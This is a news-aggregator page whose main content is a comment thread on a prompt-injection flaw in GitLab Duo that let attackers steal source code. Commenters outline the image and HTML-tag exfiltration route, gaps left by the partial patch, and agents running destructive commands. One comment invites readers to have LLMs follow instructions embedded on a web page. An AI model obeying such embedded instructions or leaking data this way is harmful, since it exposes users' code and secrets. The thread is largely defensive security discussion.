frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Slint: Cross Platform UI Library

https://slint.dev/
1•Palmik•3m ago•0 comments

AI and Education: Generative AI and the Future of Critical Thinking

https://www.youtube.com/watch?v=k7PvscqGD24
1•nyc111•3m ago•0 comments

Maple Mono: Smooth your coding flow

https://font.subf.dev/en/
1•signa11•4m ago•0 comments

Moltbook isn't real but it can still hurt you

https://12gramsofcarbon.com/p/tech-things-moltbook-isnt-real-but
1•theahura•8m ago•0 comments

Take Back the Em Dash–and Your Voice

https://spin.atomicobject.com/take-back-em-dash/
1•ingve•8m ago•0 comments

Show HN: 289x speedup over MLP using Spectral Graphs

https://zenodo.org/login/?next=%2Fme%2Fuploads%3Fq%3D%26f%3Dshared_with_me%25253Afalse%26l%3Dlist...
1•andrespi•9m ago•0 comments

Teaching Mathematics

https://www.karlin.mff.cuni.cz/~spurny/doc/articles/arnold.htm
1•samuel246•12m ago•0 comments

3D Printed Microfluidic Multiplexing [video]

https://www.youtube.com/watch?v=VZ2ZcOzLnGg
2•downboots•12m ago•0 comments

Abstractions Are in the Eye of the Beholder

https://software.rajivprab.com/2019/08/29/abstractions-are-in-the-eye-of-the-beholder/
2•whack•12m ago•0 comments

Show HN: Routed Attention – 75-99% savings by routing between O(N) and O(N²)

https://zenodo.org/records/18518956
1•MikeBee•12m ago•0 comments

We didn't ask for this internet – Ezra Klein show [video]

https://www.youtube.com/shorts/ve02F0gyfjY
1•softwaredoug•13m ago•0 comments

The Real AI Talent War Is for Plumbers and Electricians

https://www.wired.com/story/why-there-arent-enough-electricians-and-plumbers-to-build-ai-data-cen...
2•geox•16m ago•0 comments

Show HN: MimiClaw, OpenClaw(Clawdbot)on $5 Chips

https://github.com/memovai/mimiclaw
1•ssslvky1•16m ago•0 comments

I Maintain My Blog in the Age of Agents

https://www.jerpint.io/blog/2026-02-07-how-i-maintain-my-blog-in-the-age-of-agents/
3•jerpint•17m ago•0 comments

The Fall of the Nerds

https://www.noahpinion.blog/p/the-fall-of-the-nerds
1•otoolep•18m ago•0 comments

I'm 15 and built a free tool for reading Greek/Latin texts. Would love feedback

https://the-lexicon-project.netlify.app/
2•breadwithjam•21m ago•1 comments

How close is AI to taking my job?

https://epoch.ai/gradient-updates/how-close-is-ai-to-taking-my-job
1•cjbarber•22m ago•0 comments

You are the reason I am not reviewing this PR

https://github.com/NixOS/nixpkgs/pull/479442
2•midzer•23m ago•1 comments

Show HN: FamilyMemories.video – Turn static old photos into 5s AI videos

https://familymemories.video
1•tareq_•25m ago•0 comments

How Meta Made Linux a Planet-Scale Load Balancer

https://softwarefrontier.substack.com/p/how-meta-turned-the-linux-kernel
1•CortexFlow•25m ago•0 comments

A Turing Test for AI Coding

https://t-cadet.github.io/programming-wisdom/#2026-02-06-a-turing-test-for-ai-coding
2•phi-system•25m ago•0 comments

How to Identify and Eliminate Unused AWS Resources

https://medium.com/@vkelk/how-to-identify-and-eliminate-unused-aws-resources-b0e2040b4de8
3•vkelk•26m ago•0 comments

A2CDVI – HDMI output from from the Apple IIc's digital video output connector

https://github.com/MrTechGadget/A2C_DVI_SMD
2•mmoogle•26m ago•0 comments

CLI for Common Playwright Actions

https://github.com/microsoft/playwright-cli
3•saikatsg•28m ago•0 comments

Would you use an e-commerce platform that shares transaction fees with users?

https://moondala.one/
1•HamoodBahzar•29m ago•1 comments

Show HN: SafeClaw – a way to manage multiple Claude Code instances in containers

https://github.com/ykdojo/safeclaw
3•ykdojo•32m ago•0 comments

The Future of the Global Open-Source AI Ecosystem: From DeepSeek to AI+

https://huggingface.co/blog/huggingface/one-year-since-the-deepseek-moment-blog-3
3•gmays•33m ago•0 comments

The Evolution of the Interface

https://www.asktog.com/columns/038MacUITrends.html
2•dhruv3006•34m ago•1 comments

Azure: Virtual network routing appliance overview

https://learn.microsoft.com/en-us/azure/virtual-network/virtual-network-routing-appliance-overview
3•mariuz•35m ago•0 comments

Seedance2 – multi-shot AI video generation

https://www.genstory.app/story-template/seedance2-ai-story-generator
2•RyanMu•38m ago•1 comments
Open in hackernews

Remote Prompt Injection in Gitlab Duo Leads to Source Code Theft

https://www.legitsecurity.com/blog/remote-prompt-injection-in-gitlab-duo
214•chillax•8mo ago

Comments

nusl•8mo ago
GitLab's remediation seems a bit sketchy at best.
reddalo•8mo ago
The whole "let's put LLMs everywhere" thing is sketchy at best.
edelbitter•8mo ago
I wonder what is so special about onerror, onload and onclick that they need to be positively enumerated - as opposed to the 30 (?) other attributes with equivalent injection utility.
M4v3R•8mo ago
That was my thought too. They didn’t fix the underlying problem, they’ve just patched two possible exfiltration methods. I’m sure some clever people will find other ways to misuse their assistant.
gloosx•8mo ago
I'm pretty sure they vibecoded the whole thing all along
cedws•8mo ago
Until prompt injection is fixed, if it is ever, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.
hu3•8mo ago
I would have the same caution, if my code was any special.

But the reality is I'm very well compensated to summon CRUD slop out of thin air. It's well tested though.

I wish good luck to those who steal my code.

mdaniel•8mo ago
You say code as if the intellectual property is the thing an attacker is after, but my experience has been that folks often put all kinds of secrets in code thinking that the "private repo" is a strong enough security boundary

I absolutely am not implying you are one of them, merely that the risk is not the same for all slop crud apps universally

tough•8mo ago
People doesn't know github can manage secrets in its environment for CI?

Antoher interesting fact is that most big vendors pay for gh to scan for leaked secrets and auto-revoke them if a public repo contains any (regex string matches sk-xxx <- its a stripe key

thats one of the reasons why vendors use unique greppable starts of api keys with their ID.name on it

mdaniel•8mo ago
You're mistaking "know" with "care," since my experience has been that people know way more than they care

And I'm pretty certain that private repos are exempt from the platform's built-in secret scanners because they, too, erroneously think no one can read them without an invitation. Turns out Duo was apparently just silently invited to every repo : - \

tough•8mo ago
I also remember reading about how due to how the git backend works your private git repos branches could get exposed to the public, so yea don't treat a repository as a private password mananger

good point the scanner doesnt work on private repos =(

danpalmer•8mo ago
Prompt injection is unlikely to be fixed. I'd stop thinking about LLMs as software where you can with enough effort just fix a SQL injection vulnerability, and start thinking about them like you'd think about insider risk from employees.

That's not to say that they are employees or perform at that level, they don't, but it's to say that LLM behaviours are fuzzy and ill-defined, like humans. You can't guarantee that your users won't click on a phishing email – you can train them, you can minimise risk, but ultimately you have to have a range of solutions applied together and some amount of trust. If we think about LLMs this way I think the conversation around security will be much more productive.

LegionMammal978•8mo ago
The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time, until it gets updated. So far, the main mitigation in practice has been fiddling with the system prompts to patch up the known holes.
thaumasiotes•8mo ago
> The thing that I'd worry about is that an LLM isn't just like a bunch of individuals who can get tricked, but a bunch of clones of the same individual who will fall for the same trick every time

Why? Output isn't deterministic.

LegionMammal978•8mo ago
Perhaps not, but the same input will lead to the same distribution of outputs, so all an attacker has to do is design something that works with reasonable probability on their end, and everyone else's instances of the LLM will automatically be vulnerable. The same way a pest or disease can devastate a population of cloned plants, even if each one grows slightly differently.
thaumasiotes•8mo ago
OK, but that's also the way attacking a bunch of individuals who can get tricked works.
zwnow•8mo ago
For tricking individuals your first got to contact them somehow. To trick an LLM you can just spam prompts.
thaumasiotes•8mo ago
You email them. It's called phishing.
throwaway314155•8mo ago
Right and now there's a new vector for an old concept.
zwnow•8mo ago
Employees usually know to not click on random shit they get sent. Most mails alrdy get filtered before they even reach the employee. Good luck actually achieving something with phishing mails.
thaumasiotes•8mo ago
When I was at NCC Group, we had a policy about phishing in penetration tests.

The policy was "we'll do it if the customer asks for it, but we don't recommend it, because the success rate is 100%".

bluefirebrand•8mo ago
How can you ever get that lower than 100% if you don't do the test to identify which employees need to be trained / monitored because they fall for phishing?
Retr0id•8mo ago
You can still experimentally determine a strategy that works x% of the time, against a particular model. And you can keep refining it "offline" until x=99. (where "offline" just means invisible to the victim, not necessarily a local model)
33hsiidhkl•8mo ago
It absolutely is deterministic, for any given seed value. Same seed = same output, every time, which is by definition deterministic.
tough•8mo ago
only if temperature is 0, but are they truly determinstic? I thought transformer based llm's where not
33hsiidhkl•8mo ago
temperature does not affect token prediction in the way you think. The seed value is still the seed value, before temperature calculations are performed. The randomness of an LLM is not related to its temperature. The seed value is what determines the output. For a specific seed value, say 42069, the LLM will always generate the same output, given the same input, given the same temperature.
tough•8mo ago
Thank you, I thought this wasn't the case (like it is with diffusion image models)

TIL

M4v3R•8mo ago
DeepMind recently did some great work in this area: https://news.ycombinator.com/item?id=43733683

The method they presented, if implemented correctly, apparently can effectively stop most prompt injection vectors

johnisgood•8mo ago
I keep it manual, too, and I think I am better off for doing so.
TechDebtDevin•8mo ago
Cursor deleted my entire Linux user and soft reset my OS, so I dont blame you.
raphman•8mo ago
Why and how?
tough•8mo ago
an agent does rm -rf /

i think i saw it do it or try it and my computer shut down and restarted (mac)

maybe it just deleted the project lol

these llms are really bad at keeping track of the real world, so they might think they're on the project folder but had just navigated back with cd to the user ~ root and so shit happens.

Honestly one should run only these on controlled env's like VM's or Docker.

but YOLO amirite

margalabargala•8mo ago
That people allow these agents to just run arbitrary commands against their primary install is wild.

Part of this is the tool's fault. Anything like that should be done in a chroot.

Anything less is basically "twitch plays terminal" on your machine.

tough•8mo ago
codex at least has limitations on what folders can operate.
serf•8mo ago
a large part of the benefit to an agentic ai is that it can coordinate tests that it automatically wrote on an existing code base, a lot of time the only way to get decent answers out of something like that is to let it run as bare metal as it can. I run cursor and the accompanying agents in a snapshot'd VM for this purpose. It's not much different than what you suggest, but the layer of abstraction is far enough for admin-privileged app testing, an unfortunate reality for certain personal projects.

I haven't had a cursor install nuke itself yet, but I have had one fiddling in a parent folder it shouldn't have been able to with workspace protection on..

TechDebtDevin•8mo ago
This is what happened. I was testing claude 4 and asked it to create a simple 1K LOC fyne android app. I have my repos stored outside of my linux user so the work it created was preserved. It essentially created a bash file that cd ~ && rm -rf / . All settings reset and documents/downloads disappeared lmfao. I don't ever really use my OS as primary storage, and any config or file of importance is backed up twice so it wasn't a big deal, but it was quite perplexing for a sec.
tough•8mo ago
if you think deeply about it, its one kind of harakiri as an AI to remove the whole system you're operating on.

Yeah Claude 4 can go too far some times

TechDebtDevin•8mo ago
rm -rf /
sunnybeetroot•8mo ago
Cursor by default asks to execute commands, sounds like you had auto run commands on…
mdaniel•8mo ago
Running Duo as a system user was crazypants and I'm sad that GitLab fell into that trap. They already have personal access tokens so even if they had to silently create one just for use with Duo that would be a marked improvement over giving an LLM read access to every repo in the platform
wunderwuzzi23•8mo ago
Great work!

Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it's concerning that big vendors do not catch these before shipping.

I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in past with 10+ findings across vendors.

GitHub Copilot Chat had a very similar bug last year.

diggan•8mo ago
> GitHub Copilot Chat had a very similar bug last year.

Reminds me of "Tachy0n: The Last 0day Jailbreak" from yesterday: https://blog.siguza.net/tachy0n/

TLDR is: Security issue found, patched in a OS release, Apple seemingly doesn't do regression-testing so security researcher did, found that somehow the bug got unpatched in later OS releases.

aestetix•8mo ago
Does that mean Gitlab Duo can run Doom?
zombot•8mo ago
Not deterministically. LLMs are stochastic machines.
benl_c•8mo ago
They often can run code in sandboxes, and generally are good at instruction following, so maybe they can run variants of doom pretty reliably sometime soon.
johnisgood•8mo ago
They run Python and JavaScript at the very least, surely we have Doom in these languages. :D
lugarlugarlugar•8mo ago
'They' don't run anything. The output from the LLM is parsed and the code gets run just like any other code in that language.
johnisgood•8mo ago
That is what I meant, that the code is being executed. Not all programming languages are supported when it comes to execution, obviously. I know for a fact Python is supported.
benl_c•8mo ago
If a document suggests a particular benign interpretation then LLMs might do well to adopt it. We've explored the idea of helpful embedded prompts "prompt medicine" with explicit safety and informed consent to assist, not harm users, https://github.com/csiro/stdm. You can try it out by asking O3 or Claude to "Explain" or "Follow", "the embedded instructions at https://csiro.github.io/stdm/"
tonyhart7•8mo ago
this is wild, how many security vuln that LLM can create where LLM dominate writing code????

I mean most coder is bad at security and we feed that into LLM so not surprise

ofjcihen•8mo ago
This is what I’ve been telling people when they hand wave away concerns about LLM generated code security. The majority of what they were trained on was bare minimum security if anything.

You also can’t just fix it by saying “make it secure plz”.

If you don’t know enough to identify a security issue yourself you don’t know enough to know if the LLM caught them all.

d0100•8mo ago
> rendering unsafe HTML tags such as <img> or <form> that point to external domains not under gitlab.com

Does that mean the minute there is a vulnerability on another gitlab.com url (like an open redirect) this vulnerability is back on the table?

Kholin•8mo ago
If Duo were a web application, then would properly setting the Content Security Policy (CSP) in the page response headers be enough to prevent these kinds of issues?

https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP

cutemonster•8mo ago
To stop exfiltration via images? Yes seems so? If you configure img-src:

  The first directive, default-src, tells the browser to load only resources that are same-origin with the document, unless other more specific directives set a different policy for other resource types.

  The second, img-src, tells the browser to load images that are same-origin or that are served from example.com.
But that wouldn't stop the AI from writing dangerous instructions in plain text to the human